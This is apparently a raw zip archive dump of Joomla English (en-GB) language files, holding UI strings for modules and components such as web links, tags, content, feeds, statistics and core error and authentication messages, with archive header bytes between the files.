MOD_LANGUAGES_XML_DESCRIPTION="This module displays a list of available Content Languages (as defined and published in Language Manager Content tab) for switching between them when you want to use Joomla! as a multilingual site. <br />--The plugin 'System - Language Filter' has to be enabled.--<br />When switching languages and if the item displayed in the page is not associated to another item, the module redirects to the Home page defined for the chosen language.<br />Otherwise, if the parameter is set for the Language filter plugin, it will redirect to the associated item in the language chosen. Thereafter, the navigation will be the one defined for that language. <br />If the plugin <strong>'System - Language Filter'</strong> is disabled, this may have unwanted results.<br /><strong>Method:</strong><br />1. Open Language Manager Content tab and make sure the Languages you want to use in contents are published and have a Language Code for the URL as well as prefix for the image used in the module display.<br />2. Create a Home page by assigning a language to a menu item and defining it as Default Home page for each published content language. <br />3. Thereafter, you can assign a language to any Article, Category, Module, News Feed, Web Links in Joomla.<br />4. Make sure the module is published and the plugin is enabled. <br />5. When using associated items, make sure the module is displayed on the relevant pages. <br />6. The way the flags or names of the languages are displayed is defined by the ordering in the Language Manager - Content Languages.<br ><br >If this module is published, it is suggested to publish the Administrator multilingual status module."
PK!Ą"��en-GB/en-GB.com_weblinks.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_WEBLINKS_CAPTCHA_LABEL="Captcha"
COM_WEBLINKS_CAPTCHA_DESC="Please complete the security check."
COM_WEBLINKS_CONTENT_TYPE_WEBLINK="Web Link"
COM_WEBLINKS_CONTENT_TYPE_CATEGORY="Web Links Category"
COM_WEBLINKS_DEFAULT_PAGE_TITLE="Web Links"
COM_WEBLINKS_EDIT="Edit Web link"
COM_WEBLINKS_ERR_TABLES_NAME="There is already a Web Link with that name in this category. Please try again."
COM_WEBLINKS_ERR_TABLES_PROVIDE_URL="Please provide a valid URL"
COM_WEBLINKS_ERR_TABLES_TITLE="Your Web Link must have a title."
COM_WEBLINKS_ERROR_CATEGORY_NOT_FOUND="Web Link category not found."
COM_WEBLINKS_ERROR_UNIQUE_ALIAS="Another Web Link from this category has the same alias (remember it may be a trashed item)."
COM_WEBLINKS_ERROR_WEBLINK_NOT_FOUND="Web Link not found."
COM_WEBLINKS_ERROR_WEBLINK_URL_INVALID="Invalid Web link URL."
COM_WEBLINKS_FIELD_ALIAS_DESC="The alias is for internal use only. Leave this blank and Joomla will fill in a default value from the title. It has to be unique for each web link in the same category."
COM_WEBLINKS_FIELD_CATEGORY_DESC="You must select a Category."
COM_WEBLINKS_FIELD_DESCRIPTION_DESC="Enter a description for your Web link."
COM_WEBLINKS_FILTER_LABEL="Filter Field"
COM_WEBLINKS_FILTER_SEARCH_DESC="Web Links filter search"
COM_WEBLINKS_FIELD_TITLE_DESC="Your Web Link must have a Title."
COM_WEBLINKS_FIELD_URL_DESC="You must enter a URL."
COM_WEBLINKS_FIELD_URL_LABEL="URL"
COM_WEBLINKS_FORM_CREATE_WEBLINK="Submit a Web Link"
COM_WEBLINKS_GRID_TITLE="Title"
COM_WEBLINKS_LINK="Web Link"
COM_WEBLINKS_NAME="Name"
COM_WEBLINKS_NO_WEBLINKS="There are no Web Links in this category."
COM_WEBLINKS_NUM="# of links:"
COM_WEBLINKS_NUM_ITEMS="Links in categories"
COM_WEBLINKS_FORM_EDIT_WEBLINK="Edit a Web Link"
COM_WEBLINKS_FORM_SUBMIT_WEBLINK="Submit a Web Link"
COM_WEBLINKS_SAVE_SUCCESS="Web link saved."
COM_WEBLINKS_SUBMIT_SAVE_SUCCESS="Web Link submitted."
COM_WEBLINKS_WEB_LINKS="Web Links"
JGLOBAL_NEWITEMSLAST_DESC="New Web Links default to the last position. Ordering can be changed after this Web Link has been saved."
PK!�O�Woo)en-GB/en-GB.files_gantry5_nucleus.sys.ininu&1i�GANTRY5_NUCLEUS="Gantry 5 Nucleus Engine"
GANTRY5_NUCLEUS_DESCRIPTION="Nucleus rendering engine for Gantry 5."
PK!����ZZen-GB/en-GB.lib_joomla.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_JOOMLA="Joomla! Platform"
LIB_JOOMLA_XML_DESCRIPTION="The Joomla! Platform is the Core of the Joomla! Content Management System."

PK!���hhen-GB/en-GB.com_tags.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_TAGS_CREATED_DATE="Created Date"
COM_TAGS_DEFAULT_PAGE_TITLE="Tags"
COM_TAGS_FILTER_SEARCH_DESC="Enter all or part of the title to search for."
COM_TAGS_MODIFIED_DATE="Modified Date"
COM_TAGS_NO_ITEMS="No matching items were found."
COM_TAGS_NO_TAGS="There are no tags."
COM_TAGS_PUBLISHED_DATE="Published Date"
COM_TAGS_TAG_NOT_FOUND="Tag not found."
COM_TAGS_TITLE_FILTER_LABEL="Enter Part of Title"PK!X�y�gg en-GB/en-GB.mod_tags_similar.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_TAGS_SIMILAR="Tags - Similar"
MOD_TAGS_SIMILAR_FIELD_ALL="All"
MOD_TAGS_SIMILAR_FIELD_HALF="Half"
MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_DESC="How closely an item's tags need to match. All - requires that all tags in the displayed item be matched. Any - requires that at least one tag match. Half - requires that at least half of the tags match (rounded up in the case of decimals)."
MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_LABEL="Match Type"
MOD_TAGS_SIMILAR_FIELD_ONE="Any"
MOD_TAGS_SIMILAR_LAYOUT_DEFAULT="Default"
MOD_TAGS_SIMILAR_MAX_DESC="Maximum number of items to display."
MOD_TAGS_SIMILAR_MAX_LABEL="Maximum Items"
MOD_TAGS_SIMILAR_NO_MATCHING_TAGS="No matching tags."
MOD_TAGS_SIMILAR_XML_DESCRIPTION="The Similar Tags Module displays links to other items with similar tags. The closeness of the match can be specified."
MOD_TAGS_SIMILAR_FIELD_ORDERING_LABEL="Order Results"
MOD_TAGS_SIMILAR_FIELD_ORDERING_DESC="Select the order in which you want query results presented."
MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT="Number of matching tags"
MOD_TAGS_SIMILAR_FIELD_ORDERING_RANDOM="Random"
MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT_AND_RANDOM="Number of matching tags & Random"
PK!��a�88en-GB/en-GB.com_messages.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_MESSAGES_ERR_SEND_FAILED="The user has locked their mailbox. Message failed."
COM_MESSAGES_NEW_MESSAGE="New Message from %1$s at %2$s"
; The following string is deprecated and will be removed in Joomla 4.0
COM_MESSAGES_NEW_MESSAGE_ARRIVED="A new private message has arrived from %s"
COM_MESSAGES_PLEASE_LOGIN="Please log in to %s to read your message."
PK!�q(���en-GB/en-GB.mod_custom.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_CUSTOM="Custom"
MOD_CUSTOM_FIELD_PREPARE_CONTENT_DESC="Optionally prepare the content with the Joomla Content Plugins."
MOD_CUSTOM_FIELD_PREPARE_CONTENT_LABEL="Prepare Content"
MOD_CUSTOM_XML_DESCRIPTION="This module allows you to create your own Module using a WYSIWYG editor."
MOD_CUSTOM_FIELD_BACKGROUNDIMAGE_LABEL="Select a Background Image"
MOD_BACKGROUNDIMAGE_FIELD_LOGO_DESC="Select or upload an image that will automatically be inserted as an inline style for the wrapping div element."PK!�fc99$en-GB/en-GB.lib_idna_convert.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_IDNA="IDNA Convert"
LIB_IDNA_XML_DESCRIPTION="The class idna_convert allows to convert internationalised domain names (see RFC 3490, 3491, 3492 and 3454 for details) as they can be used with various registries worldwide to be translated between their original (localised) form and their encoded form as it will be used in the DNS (Domain Name System)."

PK!�	p���en-GB/en-GB.mod_stats.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_STATS="Statistics"
MOD_STATS_ARTICLES="Articles"
MOD_STATS_ARTICLES_VIEW_HITS="Articles View Hits"
MOD_STATS_CACHING="Caching"
MOD_STATS_FIELD_COUNTER_DESC="Display hit counter."
MOD_STATS_FIELD_COUNTER_LABEL="Hit Counter"
MOD_STATS_FIELD_INCREASECOUNTER_DESC="Enter the number of hits to increase the counter by."
MOD_STATS_FIELD_INCREASECOUNTER_LABEL="Increase Counter"
MOD_STATS_FIELD_SERVERINFO_DESC="Display server information."
MOD_STATS_FIELD_SERVERINFO_LABEL="Server Information"
MOD_STATS_FIELD_SITEINFO_DESC="Display site information."
MOD_STATS_FIELD_SITEINFO_LABEL="Site Information"
MOD_STATS_GZIP="Gzip"
MOD_STATS_MYSQL="MySQL"
MOD_STATS_OS="OS"
MOD_STATS_PHP="PHP"
MOD_STATS_TIME="Time"
MOD_STATS_USERS="Users"
MOD_STATS_WEBLINKS="Web Links"
MOD_STATS_XML_DESCRIPTION="The Statistics Module shows information about your server installation together with statistics on the website users and the number of Articles in your database."
PK!�
Gbssen-GB/en-GB.com_content.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_CONTENT_ACCESS_DELETE_DESC="Inherited state for <strong>delete actions</strong> on this article and the calculated state based on the menu selection."
COM_CONTENT_ACCESS_EDIT_DESC="Inherited state for <strong>edit actions</strong> on this article and the calculated state based on the menu selection."
COM_CONTENT_ACCESS_EDITSTATE_DESC="Inherited state for <strong>edit state actions</strong> on this article and the calculated state based on the menu selection."
COM_CONTENT_ARTICLE_CONTENT="Content"
COM_CONTENT_ARTICLE_HITS="Hits: %s"
COM_CONTENT_ARTICLE_INFO="Details"
COM_CONTENT_ARTICLE_VOTE_FAILURE="You already rated this article today!"
COM_CONTENT_ARTICLE_VOTE_SUCCESS="Thank you for rating this article."
COM_CONTENT_AUTHOR_FILTER_LABEL="Author Filter"
COM_CONTENT_CAPTCHA_DESC="Please complete the security check."
COM_CONTENT_CAPTCHA_LABEL="Captcha"
COM_CONTENT_CATEGORY="Category: %s"
COM_CONTENT_CATEGORY_LIST_TABLE_CAPTION="List of articles in category %s"
COM_CONTENT_CHECKED_OUT_BY="Checked out by %s"
COM_CONTENT_CONTENT_TYPE_ARTICLE="Article"
COM_CONTENT_CONTENT_TYPE_CATEGORY="Article Category"
COM_CONTENT_CREATE_ARTICLE="Submit new article"
COM_CONTENT_CREATED_DATE="Created Date"
COM_CONTENT_CREATED_DATE_ON="Created: %s"
COM_CONTENT_EDIT_ITEM="Edit Article"
COM_CONTENT_ERROR_ARTICLE_NOT_FOUND="Article not found"
COM_CONTENT_ERROR_LOGIN_TO_VIEW_ARTICLE="Please login to view the article"
COM_CONTENT_ERROR_PARENT_CATEGORY_NOT_FOUND="Parent category not found"
COM_CONTENT_FEED_READMORE="Read More ..."
COM_CONTENT_FIELD_FULL_DESC="Select or upload an image for the single article display."
COM_CONTENT_FIELD_FULL_LABEL="Full Article Image"
COM_CONTENT_FIELD_IMAGE_ALT_DESC="Alternative text used for visitors without access to images."
COM_CONTENT_FIELD_IMAGE_ALT_LABEL="Alt Text"
COM_CONTENT_FIELD_IMAGE_CAPTION_DESC="Caption attached to the image."
COM_CONTENT_FIELD_IMAGE_CAPTION_LABEL="Caption"
COM_CONTENT_FIELD_IMAGE_DESC="The image to be displayed."
COM_CONTENT_FIELD_INTRO_DESC="Select or upload an image for the intro text layouts such as blogs and featured."
COM_CONTENT_FIELD_INTRO_LABEL="Intro Image"
COM_CONTENT_FIELD_NOTE_DESC="An optional note to display in the article list."
COM_CONTENT_FIELD_NOTE_LABEL="Note"
COM_CONTENT_FIELD_URL_DESC="Link for display."
COM_CONTENT_FIELD_URL_LINK_TEXT_DESC="Text to display for the link."
COM_CONTENT_FIELD_URL_LINK_TEXT_LABEL="Link Text"
COM_CONTENT_FIELD_URLA_LABEL="Link A"
COM_CONTENT_FIELD_URLA_LINK_TEXT_LABEL="Link A Text"
COM_CONTENT_FIELD_URLB_LABEL="Link B"
COM_CONTENT_FIELD_URLB_LINK_TEXT_LABEL="Link B Text"
COM_CONTENT_FIELD_URLC_LABEL="Link C"
COM_CONTENT_FIELD_URLC_LINK_TEXT_LABEL="Link C Text"
COM_CONTENT_FILTER_SEARCH_DESC="Content Filter Search"
COM_CONTENT_FLOAT_DESC="Controls placement of the image."
COM_CONTENT_FLOAT_FULLTEXT_LABEL="Full text image float."
COM_CONTENT_FLOAT_INTRO_LABEL="Intro Image float"
COM_CONTENT_FLOAT_LABEL="Image Float"
COM_CONTENT_FORM_EDIT_ARTICLE="Edit an article"
COM_CONTENT_FORM_FILTER_LEGEND="Filters"
COM_CONTENT_FORM_FILTER_SUBMIT="Filter"
COM_CONTENT_HEADING_TITLE="Title"
COM_CONTENT_HITS_FILTER_LABEL="Hits Filter"
COM_CONTENT_IMAGES_AND_URLS="Images and Links"
COM_CONTENT_INTROTEXT="Article must have some content."
COM_CONTENT_INVALID_RATING="Article Rating: Invalid Rating: %s"
COM_CONTENT_LAST_UPDATED="Last Updated: %s"
COM_CONTENT_LEFT="Left"
COM_CONTENT_METADATA="Metadata"
COM_CONTENT_MODAL_FILTER_SEARCH_DESC="Search in title and alias. Prefix with ID: or AUTHOR: to search for an article ID or article author."
COM_CONTENT_MODAL_FILTER_SEARCH_LABEL="Search Articles"
COM_CONTENT_MODIFIED_DATE="Modified Date"
COM_CONTENT_MONTH="Month"
COM_CONTENT_MORE_ARTICLES="More Articles ..."
COM_CONTENT_NEW_ARTICLE="New Article"
COM_CONTENT_NO_ARTICLES="There are no articles in this category. If subcategories display on this page, they may have articles."
COM_CONTENT_NONE="None"
COM_CONTENT_NUM_ITEMS="Article Count:"
COM_CONTENT_NUM_ITEMS_TIP="Article Count"
COM_CONTENT_ON_NEW_CONTENT="A new Article has been submitted by '%1$s' entitled '%2$s'."
COM_CONTENT_ORDERING="Ordering:<br />New articles default to the first position in the Category. The ordering can be changed in Backend."
COM_CONTENT_PAGEBREAK_DOC_TITLE="Page Break"
COM_CONTENT_PAGEBREAK_INSERT_BUTTON="Insert Page Break"
COM_CONTENT_PAGEBREAK_TITLE="Page Title:"
COM_CONTENT_PAGEBREAK_TOC="Table of Contents Alias:"
COM_CONTENT_PARENT="Parent Category: %s"
COM_CONTENT_PUBLISHED_DATE="Published Date"
COM_CONTENT_PUBLISHED_DATE_ON="Published: %s"
COM_CONTENT_PUBLISHING="Publishing"
COM_CONTENT_RATINGS="Rating"
COM_CONTENT_RATINGS_COUNT="Rating: %s"
COM_CONTENT_READ_MORE="Read more: "
COM_CONTENT_READ_MORE_TITLE="Read more ..."
COM_CONTENT_REGISTER_TO_READ_MORE="Register to read more ..."
COM_CONTENT_RIGHT="Right"
COM_CONTENT_SAVE_SUCCESS="Article saved."
COM_CONTENT_SAVE_WARNING="Alias already existed so a number was added at the end. If you want to change the alias, please contact a site administrator"
COM_CONTENT_SELECT_AN_ARTICLE="Select an Article"
COM_CONTENT_SUBMIT_SAVE_SUCCESS="Article submitted."
COM_CONTENT_TITLE_FILTER_LABEL="Title Filter"
COM_CONTENT_VOTES="Vote"
COM_CONTENT_VOTES_COUNT="Vote: %s"
COM_CONTENT_WRITTEN_BY="Written by %s"
PK!��u�	�	 en-GB/en-GB.mod_tags_popular.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_TAGS_POPULAR="Tags - Popular"
MOD_TAGS_POPULAR_FIELD_ALL_TIME="All time"
MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_DESC="Choose if the number of tagged items should be displayed next to each tag."
MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_LABEL="Display Number of Items"
MOD_TAGS_POPULAR_FIELD_LAST_DAY="Last day"
MOD_TAGS_POPULAR_FIELD_LAST_HOUR="Last hour"
MOD_TAGS_POPULAR_FIELD_LAST_MONTH="Last month"
MOD_TAGS_POPULAR_FIELD_LAST_WEEK="Last week"
MOD_TAGS_POPULAR_FIELD_LAST_YEAR="Last year"
MOD_TAGS_POPULAR_FIELD_MAX_DESC="Sets the maximum number of tags to display in the module. Enter &quot;0&quot; to display all tags."
MOD_TAGS_POPULAR_FIELD_MAX_LABEL="Maximum Tags"
MOD_TAGS_POPULAR_FIELD_MAXSIZE_DESC="The maximum font size used for the tags, proportional to the site's default font size (eg &quot;2&quot; means 200% of the default size)."
MOD_TAGS_POPULAR_FIELD_MAXSIZE_LABEL="Maximum Font Size"
MOD_TAGS_POPULAR_FIELD_MINSIZE_DESC="The minimum font size used for the tags, proportional to the site's default font size (eg &quot;2&quot; means 200% of the default size)."
MOD_TAGS_POPULAR_FIELD_MINSIZE_LABEL="Minimum Font Size"
MOD_TAGS_POPULAR_FIELD_NO_RESULTS_DESC="Will show a message if no matching tags are found instead of hiding the module."
MOD_TAGS_POPULAR_FIELD_NO_RESULTS_LABEL="Show &quot;No results&quot; text"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_COUNT="Number of Items"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_DESC="The order that tags will show in."
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_LABEL="Order"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_RANDOM="Random"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_TITLE="Title"
MOD_TAGS_POPULAR_FIELD_TIMEFRAME_DESC="Sets the time period for which to calculate popularity."
MOD_TAGS_POPULAR_FIELD_TIMEFRAME_LABEL="Time Period"
MOD_TAGS_POPULAR_FIELDSET_CLOUD_LABEL="Cloud Layout"
MOD_TAGS_POPULAR_MAX_DESC="Sets the maximum number of tags to display in the module."
MOD_TAGS_POPULAR_MAX_LABEL="Maximum Tags"
MOD_TAGS_POPULAR_NO_ITEMS_FOUND="No Tags found."
MOD_TAGS_POPULAR_PARENT_TAG_DESC="Limit tags shown to the children of this Parent Tag."
MOD_TAGS_POPULAR_PARENT_TAG_LABEL="Parent Tag"
MOD_TAGS_POPULAR_XML_DESCRIPTION="This module displays tags used on the site in a list or a cloud layout. Tags can be ordered by title or by the number of tagged items and limited to a specific time period."
PK!�X���en-GB/en-GB.mod_feed.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_FEED="Feed Display"
MOD_FEED_ERR_CACHE="Please make cache folder writeable."
MOD_FEED_ERR_FEED_NOT_RETRIEVED="Feed not found."
MOD_FEED_ERR_NO_URL="No feed URL specified."
MOD_FEED_FIELD_DATE_DESC="Show the publication date of the feed."
MOD_FEED_FIELD_DATE_LABEL="Feed Date"
MOD_FEED_FIELD_DESCRIPTION_DESC="Show the description text for the entire feed."
MOD_FEED_FIELD_DESCRIPTION_LABEL="Feed Description"
MOD_FEED_FIELD_IMAGE_DESC="Show the image associated with the entire feed."
MOD_FEED_FIELD_IMAGE_LABEL="Feed Image"
MOD_FEED_FIELD_ITEMDATE_DESC="Show the publication date of individual RSS Items."
MOD_FEED_FIELD_ITEMDATE_LABEL="Publication Date"
MOD_FEED_FIELD_ITEMDESCRIPTION_DESC="Show the description or intro text of individual RSS items."
MOD_FEED_FIELD_ITEMDESCRIPTION_LABEL="Item Description"
MOD_FEED_FIELD_ITEMS_DESC="Enter number of RSS items to display."
MOD_FEED_FIELD_ITEMS_LABEL="Feed Items"
MOD_FEED_FIELD_RSSTITLE_DESC="Display news feed title."
MOD_FEED_FIELD_RSSTITLE_LABEL="Feed Title"
MOD_FEED_FIELD_RSSURL_DESC="Enter the URL of the RSS/RDF/ATOM feed."
MOD_FEED_FIELD_RSSURL_LABEL="Feed URL"
MOD_FEED_FIELD_RTL_DESC="Display feed in RTL direction."
MOD_FEED_FIELD_RTL_LABEL="RTL Feed"
MOD_FEED_FIELD_WORDCOUNT_DESC="Allows you to limit the amount of visible Item description text. 0 will show all the text."
MOD_FEED_FIELD_WORDCOUNT_LABEL="Word Count"
MOD_FEED_XML_DESCRIPTION="This module allows the displaying of a syndicated feed."
PK!�t��G�Gen-GB/en-GB.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.

; Keep this string on top
JERROR_PARSING_LANGUAGE_FILE="&#160;: error(s) in line(s) %s"

ERROR="Error"
INFO="Info"
MESSAGE="Message"
NOTICE="Notice"
WARNING="Warning"

J1="1"
J2="2"
J3="3"
J4="4"
J5="5"
J6="6"
J7="7"
J8="8"
J9="9"
J10="10"
J15="15"
J20="20"
J25="25"
J30="30"
J50="50"
J100="100"
J200="200"
J500="500"

JACTION_ADMIN="Configure"
JACTION_ADMIN_GLOBAL="Super User"
JACTION_COMPONENT_SETTINGS="Component Settings"
JACTION_CREATE="Create"
JACTION_DELETE="Delete"
JACTION_EDIT="Edit"
JACTION_EDITOWN="Edit Own"
JACTION_EDITSTATE="Edit State"
JACTION_LOGIN_ADMIN="Administrator Login"
JACTION_LOGIN_SITE="Site Login"
JACTION_MANAGE="Access Administration Interface"

JADMINISTRATOR="Administrator"
JALL="All"
JALL_LANGUAGE="All"
JAPPLY="Save"
JARCHIVED="Archived"
JASSOCIATIONS="Also available:"
JASSOCIATIONS_ASC="Associations ascending"
JASSOCIATIONS_DESC="Associations descending"
JAUTHOR="Author"
JAUTHOR_ASC="Author ascending"
JAUTHOR_DESC="Author descending"
JCANCEL="Cancel"
JCATEGORY="Category"
JCATEGORY_ASC="Category ascending"
JCATEGORY_DESC="Category descending"
JCLEAR="Clear"
JDATE="Date"
JDATE_ASC="Date ascending"
JDATE_DESC="Date descending"
JDAY="Day"
JDEFAULT="Default"
JDETAILS="Details"
JDISABLED="Disabled"
JEDITOR="Editor"
JENABLED="Enabled"
JEXPIRED="Expired"
JFALSE="False"
JFEATURED="Featured"
JFEATURED_ASC="Featured ascending"
JFEATURED_DESC="Featured descending"
JHIDE="Hide"
JINVALID_TOKEN="The most recent request was denied because it had an invalid security token. Please refresh the page and try again."
JINVALID_TOKEN_NOTICE="The security token did not match. The request was aborted to prevent any security breach. Please try again."
JLOGIN="Log in"
JLOGOUT="Log out"
JMONTH="Month"
JNEW="New"
JNEXT="Next"
JNEXT_TITLE="Next article: %s"
JNO="No"
JNONE="None"
JNOTPUBLISHEDYET="Not published yet"
JNOTICE="Notice"
JOFF="Off"
JOFFLINE_MESSAGE="This site is down for maintenance.<br />Please check back again soon."
JON="On"
JOPTIONS="Options"
JPAGETITLE="%1$s - %2$s"
JPREV="Prev"
JPREVIOUS="Previous"
JPREVIOUS_TITLE="Previous article: %s"
JPUBLISHED="Published"
JREGISTER="Register"
JREQUIRED="Required"
JSAVE="Save"
JSELECT="Select"
JSHOW="Show"
JSITE="Site"
JSTATUS="Status"
JSTATUS_ASC="Status ascending"
JSTATUS_DESC="Status descending"
JSUBMIT="Submit"
JTAG="Tags"
JTAG_DESC="Assign tags to content items. You may select a tag from the pre-defined list or enter a new tag by typing the name in the field and pressing enter."
JTAG_FIELD_SELECT_DESC="Select the tag to use."
JTOOLBAR="Toolbar"
JTOOLBAR_VERSIONS="Versions"
JTRASH="Trash"
JTRASHED="Trashed"
JTRUE="True"
JUNPUBLISHED="Unpublished"
JUSER_TOOLS="User tools"
JYEAR="Year"
JYES="Yes"

JBROWSERTARGET_MODAL="Modal"
JBROWSERTARGET_NEW="Open in new window"
JBROWSERTARGET_PARENT="Open in parent window"
JBROWSERTARGET_POPUP="Open in popup"

JERROR_ALERTNOAUTHOR="You are not authorised to view this resource."
JERROR_ALERTNOTEMPLATE="<strong>The template for this display is not available. Please contact a Site administrator.</strong>"
JERROR_AN_ERROR_HAS_OCCURRED="An error has occurred."
JERROR_COULD_NOT_FIND_TEMPLATE="Could not find template "_QQ_"%s"_QQ_"."
JERROR_ERROR="Error"
JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE="an <strong>out-of-date bookmark/favourite</strong>"
JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST="An error has occurred while processing your request."
JERROR_LAYOUT_GO_TO_THE_HOME_PAGE="Go to the Home Page"
JERROR_LAYOUT_HOME_PAGE="Home Page"
JERROR_LAYOUT_MIS_TYPED_ADDRESS="a <strong>mistyped address</strong>"
JERROR_LAYOUT_NOT_ABLE_TO_VISIT="You may not be able to visit this page because of:"
JERROR_LAYOUT_PAGE_NOT_FOUND="The requested page can't be found."
JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR="If difficulties persist, please contact the System Administrator of this site and report the error below."
JERROR_LAYOUT_PLEASE_TRY_ONE_OF_THE_FOLLOWING_PAGES="Please try one of the following pages:"
JERROR_LAYOUT_PREVIOUS_ERROR="Previous Error"
JERROR_LAYOUT_REQUESTED_RESOURCE_WAS_NOT_FOUND="The requested resource was not found."
JERROR_LAYOUT_SEARCH="You may wish to search the site or visit the home page."
JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING="a search engine that has an <strong>out-of-date listing for this site</strong>"
JERROR_LAYOUT_SEARCH_PAGE="Search this site"
JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE="you have <strong>no access</strong> to this page"
JERROR_LOADING_MENUS="Error loading Menus: %s"
JERROR_LOGIN_DENIED="You can't access the private section of this site."
JERROR_NOLOGIN_BLOCKED="Login denied! Your account has either been blocked or you have not activated it yet."
JERROR_PAGE_NOT_FOUND="Page not found"
JERROR_SENDING_EMAIL="Email could not be sent."
JERROR_SESSION_STARTUP="Error starting the session."
JERROR_TABLE_BIND_FAILED="hmm %s ..."
JERROR_USERS_PROFILE_NOT_FOUND="User profile not found"

JFIELD_ACCESS_DESC="Access level for this content."
JFIELD_ACCESS_LABEL="Access"
JFIELD_ALIAS_DESC="The Alias will be used in the SEF URL. Leave this blank and Joomla! will fill in a default value from the title. This value will depend on the SEO settings (Global Configuration->Site). <br />Using Unicode will produce UTF-8 aliases. You may also enter manually any UTF-8 character. Spaces and some forbidden characters will be changed to hyphens.<br />When using default transliteration it will produce an alias in lower case and with dashes instead of spaces. You may enter the Alias manually. Use lowercase letters and hyphens (-). No spaces or underscores are allowed. Default value will be a date and time if the title is typed in non-latin letters ."
JFIELD_ALIAS_LABEL="Alias"
JFIELD_ALIAS_PLACEHOLDER="Auto-generate from title"
JFIELD_ALT_PAGE_TITLE_LABEL="Alternative Page Title"
JFIELD_CATEGORY_DESC="Category"
JFIELD_FIELDS_CATEGORY_DESC="Select the category that this field is assigned to."
JFIELD_LANGUAGE_DESC="Assign a language to this article."
JFIELD_LANGUAGE_LABEL="Language"
JFIELD_META_DESCRIPTION_DESC="Metadata description."
JFIELD_META_DESCRIPTION_LABEL="Meta Description"
JFIELD_META_KEYWORDS_DESC="Keywords describing the content."
JFIELD_META_KEYWORDS_LABEL="Keywords"
JFIELD_META_RIGHTS_DESC="Describe what rights others have to use this content."
JFIELD_META_RIGHTS_LABEL="Content Rights"
JFIELD_ORDERING_DESC="Ordering of the article within the category."
JFIELD_ORDERING_LABEL="Ordering"
JFIELD_PUBLISHED_DESC="Set publication status."
JFIELD_TITLE_DESC="Title for the article."

JGLOBAL_ADD_CUSTOM_CATEGORY="Add new Category"
JGLOBAL_ARTICLES="Articles"
JGLOBAL_FIELDS="Fields"
JGLOBAL_AUTH_ACCESS_DENIED="Access Denied"
JGLOBAL_AUTH_ACCESS_GRANTED="Access Granted"
JGLOBAL_AUTH_BIND_FAILED="Failed binding to LDAP server"
JGLOBAL_AUTH_CANCEL="Authentication cancelled"
JGLOBAL_AUTH_CURL_NOT_INSTALLED="Curl isn't installed."
JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED="Empty password not allowed."
JGLOBAL_AUTH_FAIL="Authentication failed"
JGLOBAL_AUTH_FAILED="Failed to authenticate: %s"
JGLOBAL_AUTH_INCORRECT="Incorrect username/password"
JGLOBAL_AUTH_INVALID_PASS="Username and password do not match or you do not have an account yet."
JGLOBAL_AUTH_INVALID_SECRETKEY="The two factor authentication Secret Key is invalid."
; The following 2 strings are deprecated and will be removed with 4.0.
JGLOBAL_AUTH_NO_BIND="Unable to bind to LDAP"
JGLOBAL_AUTH_NO_CONNECT="Unable to connect to LDAP server"
JGLOBAL_AUTH_NO_REDIRECT="Could not redirect to server: %s"
JGLOBAL_AUTH_NO_USER="Username and password do not match or you do not have an account yet."
JGLOBAL_AUTH_NOT_CONNECT="Unable to connect to authentication service."
JGLOBAL_AUTH_NOT_CREATE_DIR="Could not create the FileStore folder %s. Please check the effective permissions."
